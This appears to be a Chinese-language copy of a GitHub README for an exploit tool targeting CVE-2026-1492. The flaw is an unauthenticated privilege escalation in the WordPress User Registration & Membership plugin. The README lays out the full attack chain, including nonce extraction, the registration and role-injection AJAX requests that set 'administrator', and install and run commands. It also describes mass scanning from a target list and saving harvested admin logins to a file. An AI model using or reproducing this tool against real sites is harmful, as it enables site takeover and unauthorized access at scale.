Nxploited/CVE-2026-1492

GitHub: Nxploited/CVE-2026-1492

针对WordPress User Registration & Membership插件的未认证权限提升漏洞,提供完整攻击链PoC的自动化利用工具。

Stars: 0 | Forks: 0

# CVE-2026-1492 ## 🔴 漏洞概述 ### CVE-2026-1492 — 未认证权限提升:会员注册过程中的管理员账户创建漏洞 | 字段 | 说明 | |---|---| | **CVE ID** | CVE-2026-1492 | | **严重性** | **严重** — CVSS v3.1 评分: **9.8** | | **攻击向量** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **CNA** | Wordfence | | **受影响软件** | User Registration & Membership — WordPress 定制注册表单生成器、自定义登录表单、用户配置文件、内容限制与会员插件 | | **受影响版本** | 所有 **5.1.2 及以下** 版本 | | **漏洞类型** | 不当权限管理 — 未认证管理员账户创建 | | **认证要求** | **无** | | **CWE** | CWE-269: Improper Privilege Management | **描述:** WordPress 的 **User Registration & Membership** 插件在所有 **5.1.2 及以下** 版本中存在 **未认证权限提升** 漏洞。漏洞源于 `user_registration_membership_register_member` AJAX 处理器在会员注册过程中接受了 **用户提供的 `role` 值**,但未执行任何服务端允许列表或权限检查。完全未认证的攻击者可以构造多步骤 AJAX 请求链——首先注册新用户账户,然后提交包含 `"role": "administrator"` 的恶意 `register_member` 调用,以静默方式创建一个具备完全权限的 WordPress **管理员** 账户。这将导致受影响 WordPress 安装被完全接管,且无需任何用户交互。 --- ## 🛠️ 工具描述 这是一个 **PoC(概念验证)** 攻击脚本,用于对运行 **User Registration & Membership** 插件易受攻击版本的 WordPress 站点执行 **完整状态感知攻击链**。该工具支持智能多阶段利用,包括自动发现、计划提取、Nonce 收集、双流程注册、角色注入与管理员验证。 ### 🔗 完整攻击链 ``` [Discovery Phase] GET /membership-pricing/ → Extract membership plan IDs GET /registration/ → Extract form fields, nonces, AJAX params ↓ [Registration Phase — Flow A] POST /wp-admin/admin-ajax.php action=user_registration_user_form_submit → Register new user account ↓ [Role Injection Phase — Flow A] POST /wp-admin/admin-ajax.php action=user_registration_membership_register_member members_data={"role":"administrator", "membership":"", ...} → Inject administrator role into newly created account ↓ [Admin Verification Phase] GET /wp-admin/ → Check for admin dashboard indicators GET /wp-admin/plugin-install.php → Confirm plugin-install access ↓ [Fallback Override — Flow B] If Flow A admin check fails → repeat with fresh username/email ↓ [Write to Nx_admin.txt] Format: https://target.com/wp-login.php user: pass:

``` --- ## 📋 系统要求 ### 系统需求 - Python **3.8** 或更高版本 - Linux / Windows / macOS ### Python 依赖 ``` pip install requests urllib3 rich ``` 或通过依赖文件安装: ``` pip install -r requirements.txt ``` **`requirements.txt`:** ``` requests>=2.28.0 urllib3>=1.26.0 rich>=13.0.0 ``` --- ## 🚀 安装 ``` # 克隆仓库 git clone https://github.com/Nxploited/CVE-2026-1492.git cd CVE-2026-1492 # 安装依赖 pip install -r requirements.txt # 运行工具 python3 CVE-2026-1492.py ``` --- ## ⚙️ 使用方法 ### 基本运行 ``` python3 CVE-2026-1492.py ``` 该工具使用由 **Rich** 驱动的完整交互式终端界面,所有参数均在运行时提示。 ### 🗂️ 目标列表格式 创建纯文本文件(默认:`list.txt`),每行一个目标: ``` https://target1.com https://target2.com http://target3.com/wordpress ``` ### 🖥️ 交互式提示 ``` Targets file [list.txt]: list.txt Credentials: - Username prefix: random number is added per site (fresh user per target/plan/flow) - Email: if left empty, it will be built from the username automatically - Password: fixed for all sites Username prefix (optional): Nxploited Email (optional): Password [Nx_12999]: Nx_12999 Threads [3]: 5 HTTP timeout (seconds) [10]: 10 ``` --- ## 🔬 漏洞利用深度分析 ### 步骤 1 — 发现 工具自动发现并解析以下内容: | 目标 | 提取内容 | |---|---| | `/membership-pricing/` | 会员计划 ID、注册页面链接 | | `/registration/` | 表单字段、Nonce、AJAX URL、会员单选输入 | | `user_registration_params` JS 对象 | `ajax_url`、`security` Nonce、表单元数据 | | `ur_membership_frontend_localized_data` | 会员专用 Nonce、AJAX 端点 | ### 步骤 2 — 注册 AJAX ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=user_registration_user_form_submit &form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}] &form_id=1 &ur_frontend_form_nonce= &security= &is_membership_active= ``` ### 步骤 3 — 角色注入 AJAX(漏洞调用) ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=user_registration_membership_register_member &members_data={"membership":"","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...} &form_response={...} &_wpnonce= &security= ``` ### 步骤 4 — 管理员验证 工具会开启新会话,使用新创建的凭据登录并探测: | 端点 | 检查的指示器 | |---|---| | `/wp-admin/` | `adminmenu`、`wp-admin-bar`、`manage_options` | | `/wp-admin/users.php` | `users.php` | | `/wp-admin/plugin-install.php` | `upload-plugin`、`plugin-install-tab` | --- ## 📁 输出文件 | 文件 | 描述 | |---|---| | `Nx_admin.txt` | ✅ 已确认的管理员账户 | | `membership_success_log.txt` | 所有成功的会员角色注入调用 | | `discovery_log.txt` | 每个目标的完整发现数据(Nonce、ID、字段) | | `registration_log.txt` | 所有注册 AJAX 请求与响应 | | `membership_log.txt` | 所有会员 AJAX 请求与响应 | | `admin_check_log.txt` | 登录尝试与管理员验证结果 | ### 管理员输出格式 ``` https://target.com/wp-login.php user:Nxploited_A_482910|pass:Nx_12999 ``` --- ## 🖥️ 终端输出示例 ``` ╔══════════════════════════════════════════════════════════════════════╗ ║ CVE-2026-1492 | User Registration & Membership — Admin PoC ║ ║ By: Nxploited | GitHub: github.com/Nxploited | @KNxploited ║ ╚══════════════════════════════════════════════════════════════════════╝ [INFO] https://target.com [OK] https://target.com | REG-A-OK user:Nxploited_A_482910 mem:3 [OK] https://target.com | MEM-A-OK membership A (role=administrator payload) sent [OK] https://target.com | ADMIN-A user:Nxploited_A_482910 pass:Nx_12999 mem:3 ┌─────────────────────────────��───────────────────────────────────────────────┐ │ Target │ Status │ Note │ ├─────────────────────────────────────────────────────────────────────────────┤ │ https://target.com │ ✅ ADMIN-A │ user:Nxploited_A_482910 ... │ │ https://target2.com │ MEM-B-FAIL │ membership not configured │ │ https://target3.com │ DEAD │ connection error │ └─────────────────────────────────────────────────────────────────────────────┘ ``` --- ## 📊 状态码参考 | 状态 | 颜色 | 含义 | |---|---|---| | `ADMIN-A` / `ADMIN-B` | 🟢 绿色 | 管理员已确认 — 流程 A 或 B | | `ADMIN-A-OVERRIDE` | 🟢 绿色 | 覆盖尝试后确认管理员 | | `REG-A-FAIL` / `REG-B-FAIL` | 🟡 黄色 | 注册 AJAX 返回失败 | | `MEM-A-FAIL` / `MEM-B-FAIL` | 🟣 洋红 | 会员角色注入调用失败 | | `REG-PENDING-A/B` | ⚫ 深色 | 账户需要邮箱验证或管理员审批 | | `NO-MEM-ID` | ⚫ 深色 | 目标未找到会员计划 ID | | `NO-UR-NONCE` | ⚫ 深色 | 无法提取注册 Nonce | | `NO-ADMIN` | ⚫ 深色 | 会员正常但未确认管理员访问 | | `TIMEOUT` | ⚫ 深色 | HTTP 超时 | | `DEAD` | ⚫ 深色 | 连接错误 — 站点不可达 | | `ERROR` | 🔴 红色 | 意外异常 | --- ## 📡 联系与作者

By: Nxploited (Khaled Alenazi)

 

--- ## ⚠️ 法律免责声明

© 2026 Nxploited (Khaled Alenazi) — 仅限授权安全研究使用。

标签:Critical, CVE-2026-1492, CVSS 9.8, PoC, WordPress, WordPress安全, 不当权限管理, 会员注册, 会员管理, 协议分析, 威胁模拟, 插件, 操作系统监控, 暴力破解, 未认证, 权限提升, 漏洞, 用户注册, 管理员创建, 越权, 逆向工具